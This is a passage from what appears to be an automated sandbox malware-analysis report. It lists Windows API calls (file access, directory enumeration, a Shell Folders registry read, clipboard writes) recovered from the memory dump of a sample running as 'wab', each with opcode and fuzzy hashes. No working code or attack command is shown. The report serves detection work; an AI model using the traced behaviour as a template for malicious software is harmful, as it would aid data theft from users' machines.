                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumNamesResource
                                                                                            • String ID:
                                                                                            • API String ID: 3334572018-0
                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3655998216-0
                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00445426
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1828521557-0
                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                            • memcpy.MSVCRT ref: 00406942
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 609303285-0
                                                                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID:
                                                                                            • API String ID: 2081463915-0
                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 2136311172-0
                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                            • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                            • String ID:
                                                                                            • API String ID: 2565263379-0
                                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                            • API String ID: 2780580303-317687271
                                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                            • String ID:
                                                                                            • API String ID: 4218492932-0
                                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                            • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                            • memcpy.MSVCRT ref: 004098B5
